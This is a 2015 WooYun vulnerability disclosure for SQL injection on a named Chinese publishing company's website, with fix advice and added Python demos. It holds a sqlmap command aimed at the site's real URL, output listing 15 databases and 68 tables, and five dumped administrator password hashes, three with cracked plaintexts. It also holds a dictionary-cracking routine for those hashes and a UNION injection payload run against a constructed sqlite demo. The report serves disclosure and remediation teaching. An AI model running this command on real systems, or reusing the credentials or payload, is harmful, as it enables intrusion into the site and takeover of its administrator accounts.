Vulnerability summary

Defect ID: wooyun-2015-0145563

Title: 中文传媒 (Zhongwen Chuanmei) SQL injection / admin passwords exposed / suspected information disclosure / 15 databases involved

Vendor: 中文传媒

Author: 冷白开。

Submitted: 2015-10-09 18:33

Fix deadline: 2015-11-23 18:34

Published: 2015-11-23 18:34

Vulnerability type: SQL injection

Severity: Medium

Self-rated Rank: 10

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org, for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-09: vendor contacted, waiting for the vendor to claim the report; details not disclosed
2015-11-23: vendor has actively ignored the report; details disclosed to the public

Brief description:

SQL injection in the 中文传媒 site; admin password hashes exposed; suspected information disclosure; 15 databases reachable from the injection point.

Detailed description:

The `LessType` parameter of the video listing page is injectable. Running sqlmap against it enumerates every database on the SQL Server instance (the presence of master, model, msdb and tempdb identifies the backend), then the tables of the current site database zwcm_2014, then the columns and contents of its AdminInfo table:

sqlmap.py -u "http://www.600373.net/mainpages/vedio.aspx?LessType=MD102" --dbs

(screenshot 1.png: sqlmap output)

available databases [15]:
[*] [zwcm_2011(old)]
[*] BookData
[*] BookExport
[*] DownloadBook
[*] HXS
[*] jxpp_2008
[*] jxpp_2012
[*] KCDB_2013
[*] master
[*] model
[*] msdb
[*] NetPerfMon
[*] PublishingResources
[*] tempdb
[*] zwcm_2014
Database: zwcm_2014
[68 tables]
+--------------------------+
| AccessCount |
| AdminDep_Less |
| AdminDep_Main |
| AdminInfo |
| AdminOperateLog |
| AdminRole |
| AdminRole_OtherList |
| BaseColumn |
| BaseInfo |
| BaseType |
| BookBinding |
| BookCLC |
| BookClass |
| BookComment |
| BookInfo |
| BookInfo_ForeignLanguage |
| BookInfo_Type |
| BookKind |
| BookLanguage |
| BookPress |
| BookPress_Type |
| BookReply |
| BookSerialize_Chapter |
| BookSerialize_Section |
| BookType_Less |
| BookType_Main |
| CityInfo |
| DBBackup |
| ImageInfo |
| ImageType_Less |
| ImageType_Main |
| InviteInfo |
| InviteInfo_User |
| LinkInfo |
| LinkType |
| Magazine |
| MagazineInfo |
| MagazineInfo_E |
| MagazineInfo_Graph |
| MagazineInfo_Type |
| MagazineType_Less |
| MagazineType_Main |
| MediaInfo |
| MediaType |
| MerchantCollection |
| MerchantOrder |
| MerchantOrder_Book |
| MerchantOrder_Rate |
| MerchantShopping |
| MessageInfo |
| MessageType |
| NewsAdjunct |
| NewsInfo |
| NewsInfo_Type |
| NewsReply |
| NewsType_Less |
| NewsType_Main |
| PeopleInfo |
| PeopleType |
| RssNews |
| RssNews_Type |
| RssType_Less |
| RssType_Main |
| UserGold_Supply |
| UserInfo |
| UserType |
| VoteInfo |
| VoteType |
+--------------------------+
Database: zwcm_2014
Table: AdminInfo
[13 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| AdminDepment | nvarchar |
| AdminEndDate | datetime |
| AdminID | nvarchar |
| AdminName | nvarchar |
| AdminPass | nvarchar |
| AdminRole | nvarchar |
| AdminVerify | nvarchar |
| ID | int |
| IFForEver | int |
| IFLocked | int |
| LastOnlineDate | datetime |
| LockEndDate | datetime |
| RegisterDate | datetime |
+----------------+----------+
Database: zwcm_2014
Table: AdminInfo
[5 entries]
+-------------------------------------------+
| AdminPass |
+-------------------------------------------+
| 0a424597916704e0e84c7fcde50a9a7d |
| ab65df7928af8f15c71eeb3ff1363029 |
| ce8b4367aa4f8057dc8f20c65db45437 (810520) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| f379eaf3c831b04de153469d1bec345e (666666) |
+-------------------------------------------+
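The AdminPass values above are 32 hex characters, i.e. unsalted MD5; the values sqlmap prints in parentheses are plaintexts it recovered with its built-in wordlist. The following is an added example (not code from the report or from the site) that reproduces that recovery against the dumped hashes with a constructed wordlist containing the plaintexts the report lists, and contrasts it with a salted, iterated PBKDF2 scheme in which the same wordlist attack no longer amortises across users. The stored-format string and the iteration count are choices made for this demo.

```python
"""Unsalted MD5 (what the AdminInfo table stores) versus salted PBKDF2.

Added example, not from the original report. DUMPED_ADMINPASS holds the
five hashes the report dumps; WORDLIST is constructed for the demo.
"""
import hashlib
import hmac
import os

DUMPED_ADMINPASS = [
    "0a424597916704e0e84c7fcde50a9a7d",
    "ab65df7928af8f15c71eeb3ff1363029",
    "ce8b4367aa4f8057dc8f20c65db45437",
    "e10adc3949ba59abbe56e057f20f883e",
    "f379eaf3c831b04de153469d1bec345e",
]

# Constructed wordlist: the plaintexts the report shows plus some filler.
WORDLIST = ["password", "123456", "666666", "810520", "admin", "111111", "123123"]


def crack_unsalted_md5(hashes, wordlist) -> dict:
    """Return {hash: plaintext} for every dumped hash found in the wordlist.

    With no salt, one MD5 per candidate word is enough to test it against
    every account at once, which is why a small dictionary already cracks
    three of the five admin accounts.
    """
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {h: lookup[h] for h in hashes if h in lookup}


def hash_password(password: str, salt=None, iterations: int = 200_000) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'iterations$salt_hex$dk_hex'.

    The format and iteration count are assumptions for this demo, not the
    site's scheme. A fresh 16-byte salt per account means identical
    passwords produce different stored values and each guess must be
    recomputed per account.
    """
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute PBKDF2 with the stored salt and compare in constant time."""
    iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2(stored_values, wordlist) -> dict:
    """Same dictionary attack against PBKDF2 records: every (word, account)
    pair costs a full PBKDF2 run, so cost scales with accounts * words."""
    found = {}
    for stored in stored_values:
        for w in wordlist:
            if verify_password(w, stored):
                found[stored] = w
                break
    return found


if __name__ == "__main__":
    print("cracked MD5:", crack_unsalted_md5(DUMPED_ADMINPASS, WORDLIST))
    rec = hash_password("123456")
    print("pbkdf2 record:", rec)
    print("verify 123456:", verify_password("123456", rec))
```

The weak plaintexts (123456, 666666, a six-digit date-like value) are the other half of the problem: even a strong hash only slows an attacker who has the column, so the site also needs a password policy and lockout (the AdminInfo table already has IFLocked and LockEndDate columns).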

Proof of vulnerability:

As above.

Fix recommendation:

You know what to do: bind the `LessType` value as a query parameter instead of concatenating it into SQL, replace unsalted MD5 in AdminInfo.AdminPass with a salted, slow hash and force a reset of the weak admin passwords, and give the site's database login access to zwcm_2014 only rather than letting it enumerate every database on the instance.
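To make the first point concrete, here is an added example (not code from the report or from 600373.net) showing the query pattern the sqlmap result implies beside its parameterised form. The real site is ASP.NET on SQL Server; sqlite3 stands in so the demo runs offline, and the table and column names are constructed for the demo (MediaInfo and AdminInfo do exist in the dump above, but their real schemas are unknown).

```python
"""Vulnerable vs parameterised handling of the LessType parameter.

Added example, not code from the original report. sqlite3 is a stand-in
for the site's SQL Server backend; schema and rows are constructed.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a public video table and an admin table
    the LessType page should never be able to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE MediaInfo (ID INTEGER, LessType TEXT, Title TEXT);
        CREATE TABLE AdminInfo (ID INTEGER, AdminID TEXT, AdminPass TEXT);
        INSERT INTO MediaInfo VALUES (1, 'MD102', 'Video one');
        INSERT INTO MediaInfo VALUES (2, 'MD102', 'Video two');
        INSERT INTO MediaInfo VALUES (3, 'MD103', 'Video three');
        INSERT INTO AdminInfo VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
        """
    )
    return conn


def videos_vulnerable(conn, less_type: str) -> list:
    """The pattern the sqlmap run implies: user input pasted into SQL text."""
    sql = "SELECT ID, Title FROM MediaInfo WHERE LessType = '" + less_type + "'"
    return conn.execute(sql).fetchall()


def videos_safe(conn, less_type: str) -> list:
    """Parameterised query: the value is bound by the driver and is never
    parsed as SQL, so the payload below is just a LessType nobody has."""
    sql = "SELECT ID, Title FROM MediaInfo WHERE LessType = ?"
    return conn.execute(sql, (less_type,)).fetchall()


# A UNION payload of the kind sqlmap sends: pull AdminID/AdminPass out
# through the two columns of the video listing. The trailing comment
# swallows the closing quote the application appends.
PAYLOAD = "MD102' UNION SELECT AdminID, AdminPass FROM AdminInfo --"


def demo() -> dict:
    """Run the payload through both versions and a normal value through
    the safe one; return the rows so the difference can be checked."""
    conn = build_db()
    return {
        "vulnerable": videos_vulnerable(conn, PAYLOAD),
        "safe": videos_safe(conn, PAYLOAD),
        "normal": videos_safe(conn, "MD102"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

In the vulnerable path the admin hash comes back as a "video" row; in the parameterised path the same string matches nothing. Parameterisation does not change what the database login is allowed to read, which is the separate least-privilege point above.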

Copyright notice: when reproducing, credit the source as 冷白开。@乌云

Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused the report